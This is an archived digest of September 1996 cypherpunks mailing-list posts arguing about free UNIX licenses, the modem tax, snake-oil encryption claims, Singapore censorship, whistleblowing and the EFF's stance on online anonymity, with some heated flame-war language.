Smith) Date: Tue, 3 Sep 1996 16:25:30 +0800 Subject: SCO giving free licenses to UNIX OpenServer Message-ID: <199609030411.XAA28740@bluestem.prairienet.org> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: hallam at ai.mit.edu, cypherpunks at toad.com Date: Mon Sep 02 23:01:35 1996 > > > > I doubt it. People don't use Microsoft products because > > of their quality or functionality. > > Errmm.. hate to disappoint but SCO UNIX started life as Xenix which > was written by Microsoft in the dark ages. > Concur. Microsoft products are used not necessarily because of quality or functionality (which are often dubious, but very occasionally present), but because of user interface and/or market share. > Today Linux probably represents the future of the UNIX family, it > allows people who want to hack at the OS level access to the sources > of a fully functioning OS. This allows people to add in new kernel > features, schedulers and other exotica without having to write a > whole new O/S. I still like FreeBSD. Similar functionality, similar availability-of-source, but very slightly easier to install/run/manage/play with. Similarly free. (FreeBSD was able to find my modem, something I couldn't get Linux to do after most of an hour. Of course I'm a *nix novice for the most part.) > Just don't confuse it with "home computing", this is geek computing > and you better have a lot of interest in computing to use it. Home > computing is the market for users who need a system that's simpler > than a VCR or they can't use it. At one time that meant Apple, today > it means Microsoft, it will never mean Linux - not unless someone > can make Linux much much simpler than it is at present and provide > decent WYSIWYG tools such as editors etc. designed for use by aunt > Ethel. I'm not sure about that... 
X-Windows seems to have a decent interface, runs on Linux, hell, most any *nix you care to name, and has some decent editors available. (Or, there's always emacs, but aunt Ethel might not grok emacs too well. I don't :) - ----- David E. Smith, P O Box 324, Cape Girardeau MO USA 63702 dsmith at prairienet.org http://www.prairienet.org/~dsmith send mail with subject of "send pgp-key" for my PGP public key "Ask not what you can do for your country; ask what your country did to you" -- KMFDM, "Dogma" From dlv at bwalk.dm.com Tue Sep 3 01:27:15 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Tue, 3 Sep 1996 16:27:15 +0800 Subject: Kill all "libertarians" In-Reply-To: <199609021626.SAA11752@basement.replay.com> Message-ID: >From nobody at REPLAY.COM Mon Sep 2 12:26:36 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Mon, 02 Sep 96 15:42:57 EDT for dlv Received: from basement.replay.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA18013 for dlv at bwalk.dm.com; Mon, 2 Sep 96 12:26:36 -0400 Received: (from replay at localhost) by basement.replay.com (8.7.5/8.7.3) id SAA11752 for dlv at bwalk.dm.com; Mon, 2 Sep 1996 18:26:28 +0200 (MET DST) Date: Mon, 2 Sep 1996 18:26:28 +0200 (MET DST) Message-Id: <199609021626.SAA11752 at basement.replay.com> To: dlv at bwalk.dm.com From: nobody at REPLAY.COM (Anonymous) Organization: Replay and Company UnLimited Xcomm: Replay may or may not approve of the content of this posting Xcomm: Report misuse of this automated service to Subject: All russians are 
scum. No exceptions. Return-Path: To: cypherpunks at toad.com Subject: Re: Sen. Leahy's "impeccable cyberspace credentials" From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Comments: Dole/Kemp '96! Date: Mon, 02 Sep 96 01:19:37 EDT Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y. Sender: owner-cypherpunks at toad.com jonathon writes: > On Sun, 1 Sep 1996, James A. Donald wrote: > > > > I agree with what you are saying but not all politicians are that bad. > > > You make it sound as if there are no politicians are for freedom of the > > > net. > > So who is the exception? > > Harry Browne Libertarian Party Candidate. Harry Browne is a fucking statist. All politicians are scum. No exceptions. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From wombat at mcfeely.bsfs.org Tue Sep 3 01:36:54 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Tue, 3 Sep 1996 16:36:54 +0800 Subject: [OFF TOPIC] Re: SCO giving free licenses to UNIX OpenServer In-Reply-To: <322B4E8E.41C6@ai.mit.edu> Message-ID: Ah, round 274,562,889 of the OS wars ... On Mon, 2 Sep 1996, Dr Phill wrote: > Eric Murray wrote: > > > > Scottauge at aol.com writes: > > Errmm.. hate to disappoint but SCO UNIX started life as Xenix which > was written by Microsoft in the dark ages. > OTOH, UNIX Systems Labs was sold to Novell, who didn't do much with it, and then sold it to SCO. A free single-user license sounds suspiciously like the old Novell Personal Edition Unixware. Anybody know if this is what's being given away? I'd look, but I haven't got much use for yet another free UNIX - the two I have work fine. > > > > This is for single user home based UNIX systems. > > > > Single-user UNIX isn't all that useful. > If this is the old Pers. Ed., it will support one or two users via telnet/ftp in addition to console. 
Certainly enough for someone who wants a system for educational purposes, using X-windows to access the office, work on coding, etc. If you want to write a commercial app. for SCO, it's darn nice of them to give you a free license to use as a development platform. > Multi-user ain't much better. Listen to the guys who built it. UNIX > is a program development environment. In the early years it was > interesting because there was source available, that ceased to be > the case years ago. I feel so stupid for having bought all that Sun Microsystems and HP stock years ago ... It is a good platform for many applications; running a desktop OS for a user who only types memos and takes phone messages probably isn't one of them, although I'm sure I'll hear from someone who disagrees. It does make a good, scalable base for SQL databases, is the primary handler of email, runs a lot of the world's engineering software, etc ... I'm sure if you looked around you'd even find Solitaire for it. :) I use M$-Windoze as the standard desktop for most business applications, with UNIX-based SQL servers, web servers, and email servers, in general. Just my preference. > > Today Linux probably represents the future of the UNIX familly, it > allows people who want to hack at the OS level access to the sources > of a fully functioning OS. This allows people to add in new kernel > features, schedulers and other exotica without having to write a > whole new O/S. > I wouldn't expect a free OS in a constant state of change to replace commercially supported operating systems; they each have their purposes. Some people want access to the source code, and some people want 24x7 on site support. Yes, there's great support available for Linux and BSD on the 'net. That's not at issue. Some business models need a vendor out there that can furnish a maintenance contract and uphold it. 
> Just don't confuse it with "home computing", this is geek computing > and you better have a lot of interest in computing to use it. Home > computing is the market for users who need a system that's simpler > than a VCR or they can't use it. At one time that meant Apple, today > it means Microsoft, it will never mean Linux - not unless someone > can make Linux much much simpler than it is at present and provide > decent WYSIWYG tools such as editors etc. designed for use by aunt > Ethel. Maybe Aunt Ethel is into kernel tuning. ;) I agree with you to a point; UNIX has not had an idiot-proof "stick the disk in the drive and type setup" capability until recently. UNIX apps are fewer in variety, and cost more than their M$-D0S/Windoze counterparts. Partly because anyone who wanted to develop could do so on an affordable D0S system. If the free SCO offering is the old Novell Pers. Ed. (I don't know, just venturing a guess), Aunt Ethel just might be able to install it (your Aunt Ethel - mine's a kernel hack). As I recall, it came w/ a GUI installation routine. Just my $.02 > > > Phill > From jimbell at pacifier.com Tue Sep 3 02:02:42 1996 From: jimbell at pacifier.com (jim bell) Date: Tue, 3 Sep 1996 17:02:42 +0800 Subject: Modem tax again? Message-ID: <199609022230.PAA15730@mail.pacifier.com> Yes, isn't it interesting how they managed to turn this issue into their desire to "end a subsidy," when you know they would be terrified of REALLY ending the various telephone subsidies that are operating. For years, businesses have paid more for telephone service than residences. While this might have made sense in the era before digital switches, it does no longer. Also, the claim that "Internet users are overtaxing phone networks and ought to pay more for monthly service" isn't believable. 
In my experience, the time between 9:30 pm and 11:00 pm is the only time which usually produces busy signals to my ISP, a time which is when, traditionally, telephone traffic is quite light as compared to peak hours. I'd be happy to compare the "usage-factor versus time" of ISP's versus regular voice calls if I had the numbers, but I suspect that calls to local ISP's complement voice traffic rather than add to its peaks. At 01:40 PM 9/2/96 EDT, E. ALLEN SMITH wrote: > As I recall, the alleged "subsidy" consists of lack of payments so >rural areas can have subsidized phone service - thus making their costs borne >by everyone else. > -Allen > >> _________________________________________________________________ >> Avis >> _________________________________________________________________ >> INTERNET IS HURTING PHONE NETWORKS, STUDY SAYS >> __________________________________________________________________________ >> Copyright © 1996 Nando.net >> Copyright © 1996 San Francisco Examiner > >> SAN FRANCISCO (Aug 27, 1996 3:11 p.m. EDT) -- Hoping to reduce or end >> a subsidy that has kept down the cost of on-line service, local phone >> companies here have presented the Federal Communications Commission >> with studies arguing that Internet users are overtaxing phone networks >> and ought to pay more for monthly service. > >> The studies, one of which was published on the Internet, argue that a >> 13-year-old subsidy lets Internet service providers (ISPs) pay a >> fraction of what a long distance company pays to get a phone line, >> even though Internet calls may use more phone system capacity than >> voice traffic. > >[...] > >> For their part, ISPs are alarmed at the remote possibility that the >> FCC might let phone companies raise their monthly costs from the >> current monthly average of $30 to anything approaching the $600 that >> some long distance carriers pay for a phone line. 
> >> "If we had to pay anything like long distance access charges, it would >> put all the ISPs out of business," said Ronald Plesser, the >> Washington, D.C., attorney who represents the Commercial Internet >> Exchange, an ISP trade group. > >> FCC staff attorney Kevin Werbach said the subsidy began in 1983, when >> the five-member federal commission created a special rate to encourage >> the growth of on-line services, voicemail companies and other emerging >> industries that offered enhanced electronic services over phone lines. > >> In 1987, the FCC considered ending the subsidy but backed down after >> public protest over what came to be characterized as the "modem tax." >> Given the growth in on-line usage, ISPs assume any talk of ending the >> subsidy would create a bigger backlash today. > >> "There are a minimum of 20 million and perhaps as many as 40 million >> on-line and Internet users and many of them are registered voters," >> said William Schrader, president of PSI Net, an ISP in Herndon, Va. > >> Schrader said when he visited several FCC members recently, he >> suggested that many of those users would be happy to send a letter of >> protest to FCC Chairman Reed Hundt. > >[...] > >> Copyright © 1996 Nando.net > > Jim Bell jimbell at pacifier.com From unicorn at schloss.li Tue Sep 3 02:19:15 1996 From: unicorn at schloss.li (Black Unicorn) Date: Tue, 3 Sep 1996 17:19:15 +0800 Subject: Pseudocrypto detector is going wild (was: Re: ALPHACIPHER - An unbreakable encryption program.) In-Reply-To: <864tlgivwo.fsf@goffette.research.megasoft.com> Message-ID: On 2 Sep 1996, C Matthew Curtin wrote: Alex Walker > claims: > > The strongest encryption system available to the public will be available > > soon at: [Blah Blah Blah] > > > > A demo of this program along with a FAQ can be downloaded from > > cyber-survival-hq 1SEP. This is an unbreakable program... > > Here we go again. > > I just got done surfing the site above. 
Assuming that all statements > regarding the unbreakability of the cipher, the lack of applicability > of the question regarding its key size, etc., are at least based on > some degree of truth, "alphacipher" is a one-time pad. Given that > anything else is not really "unbreakable," if it's not a one-time pad, > the claims about its security are bogus. Looks like another snake oil peddler. Look, Mr. Walker: Either you are a marketing type, in which case I suspect you have no idea what you are peddling, you are a technical type, in which case you are deceiving us, or you don't really know what you are doing, in which case you are making representations without the benefit of knowledge. In any of these cases, you are, it seems to me, peddling garbage. > If I'm wrong, please show me how so. If not, please do us all a favor > and quit with the advertising claims. Crypto, for some reason, seems to be at the level of hair tonic when it comes to hype advertising making up for 0 in product quality. > (All I need now is someone to threaten to sue me, and I'll maintain my > record of having lawsuit threats made against me every time I > criticize something that claims to be "strong crypto.") Any attorney who knew anything would have that suit laughed out of court. If he sues in D.C. come see me. > - -- > C Matthew Curtin MEGASOFT, INC Chief Scientist > I speak only for myself. Don't whine to anyone but me about anything I say. > Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From mch at squirrel.com Tue Sep 3 02:22:22 1996 From: mch at squirrel.com (Mark C. Henderson) Date: Tue, 3 Sep 1996 17:22:22 +0800 Subject: DON'T Nuke Singapore Back into the Stone Age In-Reply-To: Message-ID: <9609022116.TE21076@squirrel.com> On Sep 2, 7:06, James Seng wrote: > Subject: Re: DON'T Nuke Singapore Back into the Stone Age > On Sat, 31 Aug 1996, Timothy C. 
May wrote: > > The point is to make clear to them that the Usenet and similar Web sites > > are global in nature, not subject to censorship without a very high local > > cost. If discussions of Lee Kuan Yew's dynasty are considered illegal, then > > Singaporeans will have to choose not to carry the various newsgroups into > > which *I* post such messages! > > Just let to add my comment in regard to this unfortunate discussion. > > To understand the situation better, you should not impose America > ideology and perspection on how things to be done to Singapore. Singapore > maybe young but there are certain culture too. Let me see, our "American ideology" is blinding us to the wonderful government of Singapore which jails and tortures its citizens for expressing political views which might call the government of Singapore into question. Check out, for example, this interview with the former Solicitor General of Singapore. http://www.unl.edu/scarlet/v5n33/v5n33qa.html Nothing earth shattering at this URL - just what we all expect from a police state. -- Mark Henderson -- mch at squirrel.com, henderso at netcom.com, markh at wimsey.bc.ca ViaCrypt PGP Key Fingerprint: 21 F6 AF 2B 6A 8A 0B E1 A1 2A 2A 06 4A D5 92 46 unstrip for Solaris, Wimsey crypto archive, TECO, computer security links, change-sun-hostid, Sun NVRAM/hostid FAQ - http://www.squirrel.com/squirrel/ From enzo at ima.com Tue Sep 3 02:26:13 1996 From: enzo at ima.com (Enzo Michelangeli) Date: Tue, 3 Sep 1996 17:26:13 +0800 Subject: Encourage Singapore To Come Out Of the Stone Age In-Reply-To: <199609021945.MAA05327@dns2.noc.best.net> Message-ID: On Sun, 1 Sep 1996, James A. Donald wrote: > At 07:13 PM 9/2/96 +1000, James Seng wrote: > > What i am saying is that Asian (Singapore) > > values are _DIFFERENT_ from western (America) values. > > One of the classic Greek rationalizations for slavery was that Asians > are slaves by nature. > > It would seem that you are saying that they were right. 
Only if you assume that values depend on the nature, which James didn't say. (Besides, Greeks didn't need to rationalize: slavery was part of their society, not only in cities like Sparta based on a caste-style social structure, but also in the "democratic" Athens. Aristoteles shrugged off the whole issue saying that slavery would have been abolished only if "machines could move by themselves": and the prophecy has proven accurate indeed). Back to the nature vs nurture issue: even though I usually agree with most of what you say, I must disagree with your .Sig file: > We have the right to defend ourselves | http://www.jim.com/jamesd/ > and our property, because of the kind | > of animals that we are. True law | James A. Donald > derives from this right, not from the | > arbitrary power of the state. | jamesd at echeque.com The idea that rights and values can be "natural" is contradicted by several thousand years of history, during which absolutism or downright tyranny have been well more common than freedom. The success of that misleading view in America, and by extension in most of the western countries, is largely due to the unfortunate influence of French rationalism over the founding fathers, as Hayek repeatedly noted. (A similar criticism of the theory of built-in values in Rousseau and his followers, with emphasis on the ethical -as opposed to economic/ political- side, was moved by Nietzsche in "Human, all too human"). In the real world, freedom is a by-product of a materially prosperous society (which is why capitalism generally produces free societies, but socialism does not). Constitutional papers should spell what a society guarantees to and what it expects from its members, not the (supposed) nature of the latter. Trying to build a free society by screaming loud what the "natural" rights are supposed to be, has no better chances of success than trying to summon a god into existence by virtue of prayers. 
Enzo From unicorn at schloss.li Tue Sep 3 02:43:27 1996 From: unicorn at schloss.li (Black Unicorn) Date: Tue, 3 Sep 1996 17:43:27 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <199609022254.PAA09742@netcom10.netcom.com> Message-ID: On Mon, 2 Sep 1996, Vladimir Z. Nuri wrote: > > ah, the quasi-yearly ranting on EFF has started up. what a great > opportunity for drop-down-drag-dead flamewar. > > Black Unicorn: I resent your holier-than-thou moral posturing > over EFF, and am going to attack it as representative of other > criticism I have seen of EFF. I, unlike EFF, have never compromised my efforts to make strong crypto, unescrowed strong crypto, and digital communications, free from the FUD spouted by government and media alike. I, unlike EFF, have never compromised my efforts to resist the expansion of a wiretap state. I, unlike EFF, have never purported to be a political representative for these positions and folded under the weakest of pressures like a reed. > EFF is an organization that is professional and has > worked toward improving cyberspace. it is easy for someone > such as yourself to criticize such an organization anonymously, > but what is the justification of your criticism? to me someone > who has tried and failed, yet is still trying, is better than > someone who has never tried. I would put forth that you know nothing of my efforts, and therefore are in no position to judge me. I would also put forth that the efforts of EFF, or lack thereof, are quite public. > what *constructive* > alternative to EFF do you propose? if you have none, please shut up. I think any organization that would apply political pressure rather than bow to it would be an alternative. I think an organization in touch enough with its own policy to prevent its staff and board from making embarrassing big brother type proposals to curtail the ability of any of us to post without attribution would be an alternative. 
I think an organization without the internal conflict and strife that has clearly marred EFF in past and made it a laughable attempt at cohesive political persuasion would be an alternative. I think an organization that had official policies on the core issues which it proposes to influence would be an alternative. In short, an organization that had even one of the needed elements of legislative influence. (Cohesive, directed, persistent, and uncompromising). > I am tired of people announcing loudly to the world, "well if EFF > doesn't support [insert my personal jihad here], then they're > a bunch of losers who don't deserve anyone's money". Now who's holier-than-thou? What is so shocking about announcing that a given organization does not support my interests and therefore calling on others who share my interests not to make financial donations to said organization? Is there something EFF fears in free speech and political consensus building? Perhaps if they had a straightforward policy.... Were I to say that the Clinton administration has accomplished nothing but oppression (not that this is necessarily my view) and that others should place their resources elsewhere would you claim that somehow I was in the wrong? Political speech is in the air every day. Learn to live with it, even if you do not agree with the points contained within. Phrased another way, who cares what you are tired of hearing? That's what filters and channel changers and off buttons are for. > >Why am I any more mistaken for pointing out that a single influential > >member of EFF's staff or board is anti-anonymity and yet remains with the > >organization than you are for pointing out that a single influential > >member who happened to be anti-anonymity has left? > > get a clue. an organization does not have to officially espouse what > its members espouse. No, but when an organization espouses nothing on a given subject key to its mission, what does that say? 
What about when its members espouse entirely different and even counter productive beliefs? I would hardly trust Senator Burns on the board of the ACLU, or a George Pacific exec on Sierra Club's board. What's different here? > what an organization espouses should be carefully > crafted. if all members feel strongly about an issue, yet all also > feel that it should not be part of the official plank, then that may be > a wise decision to leave it out. what an organization does *not* do is as > important as what it does do. EFF is learning, by trial and error and the > hard way, to "choose battles wisely". I thought its point was to protect cyberspace? What battles are left after Digital Telecom, Anonymous Communication, Strong Crypto and CDA? There aren't many battles to choose. Let's see some action. I can sit on my hands all day long too, but I will hardly claim to be supporting hunger prevention in Africa by "thinking very hard about the subject." (Particularly not when I have accepted money to further that goal). > I would love to see more info about EFF's new direction. but one > can ask for such clarification without a rabid style such as your own. Are you one of those people who still believes you can get more flies with honey...? Ever been to Washington, D.C.? > >In so far as an organization is much defined by those involved, I think it > >entirely right to wonder aloud about the personal motives of the staff and > >board. I think this PARTICULARLY prudent given EFF's reputation and prior > >conduct. > > blah, blah, blah. why should EFF give the slightest damn what you think > of them? It's fairly clear that they don't. That said, why should I not make that point known. "Folks, EFF doesn't give a damn what I think. If you think what I think, then they don't give a damn what you think either." This is called POLITICS. They are free to ignore people like me when we comment that their public appearance is damaging them. 
They will also pay the price for doing so. What kind of organization purports to support and then ignores the public? > if you were at the helm of a competing organization that > was doing superior work, or a privacy lobbyist with a track record, > maybe they should listen. as it stands I think they are giving you > far more respect than you deserve by even responding to your > various scurrilous insinuations. Apparently their view of the respect I deserve and yours are disparate. You yourself admitted that my criticisms were generally representative. I hardly think my worth is the issue. > why do I see so much of this in cyberspace and on the cpunks list: > gripes, gripes, gripes by people who have no record themselves of > doing anything constructive...? the difficulty of doing something > constructive is proven by the failures, it is not necessarily > evidence of incompetence or conspiracies. perhaps you, Unicorn, > feel the cpunks have a greater track record than EFF? I do in fact feel the cpunks have a greater track record than EFF. Tell me, what has EFF done? The list of "cypherpunk" accomplishments in terms of making the net a better place to be is, in my view, significant. Certainly the discussion here is livelier than anything I've seen from EFF. > >I would be most happy to be proven wrong and see EFF suddenly, in a burst > >of impressive moral fiber, speak out publically and take some political > >action to assure anonymous communication. > > I would like you to explain why you feel the need to criticize EFF > for not necessarily sharing your own agenda. The same reason I feel free to criticize communism for not sharing my own agenda. You reveal here the basic character of your objection. You don't like the fact that I criticized EFF. It has nothing to do with the fact that you think EFF has done wonderful and fantastic things (you point to none in this post) but that you have some emotional fondness for them. This is the trap. 
EFF _sounds_ good, and so its worth sticking up for. Well what, EFF, have you done for us LATELY? > >Well, let's have a clear official position issued then to end all dispute. > > again, you fail to grasp: EFF may justifiably not want to engage in that > fight. it might be a wise decision. who are you to dictate EFF's > agenda? why are you picking a fight with someone who might be the > best ally? If EFF is the best ally then we need to seek others. They have done nothing in my view to help keep strong crypto around, to secure a person's right to speak without a citizen unit I.D. being attached, and to promote, by extension, free speech. Look, even you have gotten on my case here for speaking without revealing my real name. You think something I said libelous? Is it dangerous? Would you like to contact me further about it? What precisely is the need to attach my real name to this work about? It's about retribution. It's about the need to see people unable to really speak as they think, and the need to have words softened so no one is "hurt." Forget it. I will not pay the political and financial price of revealing my name just to make you, or anyone else, happy. > >I'm hardly going to support an organization that proports to be > >pro-internet freedom and yet has no official position on anonyminity. > > perhaps you would be more influential if you learned to spell what > you are advocating. (hee, hee) English is not my first language. Start paying my hourly rate to type in the thousands of words and dozens of legal summaries I send to this list every month and I will begin to proof read carefully. > > Of > >course you should expect people to wonder about EFF when you have no > > official position and yet some staff and board members seem to have a > >statist bent. > > and you, like many other cypherpunks and cyberspace weasels, > have a whine-and-shriek-from-the-shadows bent. And your point is? You'd like the shadows lifted? 
Speaking without a true name attached is somehow evil? > BTW, I reject the claim by some here (e.g. TCM) that the supposed change in > direction at EFF implies that such an organization is inherently > top-heavy and will fail in comparison to cypherpunk guerilla-style > "technology deployment." it seems to me both the cpunk philosophy > and the EFF philosophy can coexist, and I really get tired of people > who can't think past a "only one can exist" worldview. Why not make some solid arguments for why TCM is wrong then? Certainly it appears he is on the mark to me. > I also don't understand the anonymity fight by cpunks. it's the > wrong battle imho. ask any remailer operators how their services > are panning out. they will complain of the incessant spam and > increasing litigious pressure. I don't see any technological > solutions to these problems. if there were, they'd have been > invented now. This is EFF talking. "The situation is hopeless, bail now to preserve image." > let's face it, anonymity is a pain in the ass > to support. maybe there are other goals that are more crucial > that lie at the heart of anonymity. what cpunks are really > seeking is "assurance of freedom from retribution". when the > problem is phrased more openly like that, other solutions become > possible and worth consideration. anonymity is only one such > way to achieve this goal. I for one would like to see more > experimentation with reputation systems. "aw gee, nobody knows what > one would look like". well, that's the point. Explain to me how reputation systems work in the absence of anonymity. Explain to me when freedom has been anything but "a pain in the ass." Weakness is all you have to offer. Offer it to EFF. -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From stewarts at ix.netcom.com Tue Sep 3 02:46:24 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 3 Sep 1996 17:46:24 +0800 Subject: What is the EFF doing exactly? 
Message-ID: <199609030615.XAA15848@toad.com>

Black Unicorn wrote:
>> > > What is or is not your personal or EFF's official position is meaningless.
>> > > It is clear that the personal beliefs of those involved in EFF are those of compromise, present day politics, and a general lack of moral fiber.

While nobody's called Esther Dyson a Communist here yet, there are people on the board I disagree with - Mitch Kapor, in particular, has shown signs of being a (gasp!) Democrat!

My initial reaction to the EFF's first year or two was that they were doing some very good things (the Steve Jackson defense), and also had people making speeches about the need to provide everybody with access to the Information SuperHighway. Getting the S.266 anti-crypto-pro-wiretapping bill killed a few years ago was what convinced me to join them, though their compromise positions on some of the other anti-freedom bills since then have not helped my mixed views of the organization. With all due respect to Jerry Berman, I'm more comfortable now that they're not Washington Insiders any more.

>Why am I any more mistaken for pointing out that a single influential member of EFF's staff or board is anti-anonymity and yet remains with the organization than you are for pointing out that a single influential member who happened to be anti-anonymity has left?
....
>Maybe there should be an EFF position on the matter.

Maybe. If it's a good position, it will recognize that anonymity is a mixed blessing; there are people who use it creatively and responsibly, like Black Unicorn and Lucky Green, and there are spammers who abuse it to the detriment of society, like the slimeball who used my remailer to post hatemail to the gay newsgroups with somebody else's name attached to the bottom.
On the other hand, free speech is also a mixed blessing; there _are_ things I wish people had the good taste not to say, but I'm not going to get in Voltaire's way while he defends to the death their right to say them...

# Thanks; Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
#
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto

From stewarts at ix.netcom.com Tue Sep 3 02:57:01 1996
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Tue, 3 Sep 1996 17:57:01 +0800
Subject: Whistleblowing on the Internet
Message-ID: <199609030615.XAA15838@toad.com>

At 04:02 PM 9/2/96 EDT, "E. ALLEN SMITH" wrote:
>There's also the point that some whistleblowing isn't exactly what some political groups would want to occur. For instance, opponents to unions such as myself aren't going to want a whistleblower to be able conveniently to report their exclusion from a job due to union membership.

While some unions are clearly run by and for thugs, some employers have also hired thugs to attack union organizers, and both unions and employers have convinced government thugs to attack their opponents, though unions generally have convinced governments to write laws with fines attached, while employers have often had actual Federal troops shooting union strikers, and have had police refrain from defending strikers from attack. In a free market, there wouldn't be laws requiring or forbidding union membership, and some unions would prosper by providing good service to their members and to the employers that hire them, while others wouldn't.
I'd be happy to see union members able to anonymously blow the whistle on employers that blacklist union members, though it's harder to be credible with the public if you're anonymous, and particularly hard to get people to believe "Employer MegaFooBar refused to hire [name deleted for privacy], a member of the IBCPARO, because of his union membership" without revealing enough about the union member's identity that the employer knows, and therefore telling all other employers to know that the guy is not only a union member, but also a troublemaker. In this case, the technology is more strongly useful for maintaining blacklists than for detecting or outing blacklist users.

Unfortunately, that's especially true because government taxation and anti-immigrant policies require that employees provide employers with a [mostly] unique ID number and papers to prove who they are, so you can't just show up at a construction-workers' hiring hall, call yourself Joe, and get your pay in cash at the end of the day. (Unless you're already an illegal immigrant, in which case it works fine, but then it's tough to be a union member.)

# Thanks; Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
#
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto

From stewarts at ix.netcom.com Tue Sep 3 03:00:47 1996
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Tue, 3 Sep 1996 18:00:47 +0800
Subject: Whistleblowing on the Internet
Message-ID: <199609030615.XAA15843@toad.com>

Geoffrey Gussis wrote:
>| Overall, I am quite surprised that there isn't a whistleblowing clearinghouse on the Internet; a site sponsored by a non-profit that lists email addresses and secure forms for sending anonymized email to those areas of the public and private sector that deal with whistleblowing.

Alt.whistleblowing was started a while ago, and was probably pretty quiet (not that I've read it in years.)
Of the 5 articles there today, one is from Geoffrey Gussis, one is a reply, one has an EPA phone number, one is test, and one is spam. The reply said
#> See www.taf.org on the net.
#> See www.whistleblowers.com on the net
#> In a few weeks, our site will be up, and we are also involved in bringing false claims act or whistleblower lawsuits. We have one under seal, and three more pending.

> Such a clearinghouse is what we call a fat target; something likely to attract attention since wiretapping it could be very useful to an organization that worried about having a whistleblower.

That kind of wiretapping we can deal with. Forging Usenet headers was easy enough even without anonymous remailers, and chaining encrypted messages through remailers should be adequate, even without the huge mix volume of anon.penet.fi.

# Thanks; Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
#
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto

From jimbell at pacifier.com Tue Sep 3 03:09:22 1996
From: jimbell at pacifier.com (jim bell)
Date: Tue, 3 Sep 1996 18:09:22 +0800
Subject: POT_hot
Message-ID: <199609030651.XAA09953@mail.pacifier.com>

At 11:39 PM 9/2/96 GMT, John Young wrote:
> Foreign Affairs, Sep/Oct, Lead Essay:
>
> "Postmodern Terrorism. The terrorism of the future may be far more destructive than terrorism as we have known it."
>
> An informative survey and pot-heat by Walter Laqueur.
>
> Terrorism's prospects, often overrated by the media, the public, and some politicians, are improving as its destructive potential increases. Terrorism has replaced wars between nations of the 1800s and 1900s.

[deleted]

> Why assassinate a politician or indiscriminately kill people when an attack on electronic switching will produce far more dramatic and lasting results?
> If the new terrorism directs its energies toward information warfare, its destructive power will be exponentially greater than any it wielded in the past -- greater even than it would be with biological and chemical weapons. The single successful one could claim many more victims, do more material damage, and unleash far greater panic than anything the world has yet experienced.
> http://jya.com/pothot.txt (30 kb)

Am I being unreasonable to expect at least a certain degree of logic in the world? Why is it that this guy (Laqueur) seems to believe that the future is filled with "greater panic than anything the world has yet experienced." I believe that, while there may be panic, it'll be panic on the part of the politicians, not ordinary citizens.

I suppose a certain amount of bias is to be expected, seeing as how it's Foreign Affairs magazine.

Jim Bell
jimbell at pacifier.com

From mech at eff.org Tue Sep 3 03:14:42 1996
From: mech at eff.org (Stanton McCandlish)
Date: Tue, 3 Sep 1996 18:14:42 +0800
Subject: What is the EFF doing exactly?
In-Reply-To:
Message-ID: <199609022255.PAA19109@eff.org>

(You may need to manually repost this to c'punks. NB: I did not authorize redistribution of my email to you to c'punks in the first place. But since it's there now...

Black Unicorn typed:
>
> Why am I any more mistaken for pointing out that a single influential member of EFF's staff or board is anti-anonymity and yet remains with the organization than you are for pointing out that a single influential member who happened to be anti-anonymity has left?

I didn't say you were more mistaken than anyone or anything else. I'm not aware of a mistakenometer with which to make such a measurement.
I pointed out your assumption that "It is clear that the personal beliefs of those involved in EFF are those of compromise, present day politics, and a general lack of moral fiber" is not in fact "clear" at all, because you have insufficient information to make such a statement. You don't even have to believe my remark that others in EFF have very pro-anonymity positions - your categorization of EFF is still logically bankrupt, because you don't have enough facts to make it.

> If my position, as you represent, is misguided, surely your point about Mr. Johnson is equally so. If the board is almost 100% pro-anonymity, where's the official position?

The board is not almost 100% pro-anonymity. There are widely differing opinions on the topic, and many board members have not directly wrestled with this issue before at all. I've seen some opinions shift in the space of a few messages. This should clearly illustrate why there is no official position yet. Some EFFers are not only not in agreement with each other on this, but aren't sure where they stand at all. This is the first time the issue has come up for the board as a whole since early 1995, and the board's composition is very different now.

This is the same process EFF goes through every time an issue comes up on which we have no position. Sometimes a position is agreed upon, and there we are, but sometimes no position is taken, as is still the case with intellectual property. In cases like that, we look at what happens on a case by case basis, rather than categorically. (That is to say, even on stuff where we have no position, if something happens that harms the public interest we do not feel any obligation not to act simply because we lack a position on the meta-issue.)

It will take some time to formulate a position on it. Personally, I am confident that if EFF takes a position on online anonymity, it will be the positive stance you would expect from us.
It is also likely to be tempered with a discussion of responsibility issues, just like every other EFF position. This is not a "sellout" or a "compromise" just a recognition of fact: anonymity does have costs associated with it, such as the ability to defame without the defamed party having much recourse other than contradiction. Such costs should be stated openly, not lied about or ignored. If EFF or other organizations pretend there are no costs or belittle concerns about costs, we undermine everything we are working for - we undermine the public interest and individual liberty.

> In so far as an organization is much defined by those involved, I think it entirely right to wonder aloud about the personal motives of the staff and board. I think this PARTICULARLY prudent given EFF's reputation and prior conduct.

That's fine. I do think you should wonder. But wondering and making unfounded accusations are different things. It's one thing to say, "I wonder if Black Unicorn has good moral fiber whatever that is, and in fact I suspect he doesn't" (hypothetically, mind you), but it's quite another to say "Black Unicorn has no moral fiber!" (whatever moral fiber might be.)

>
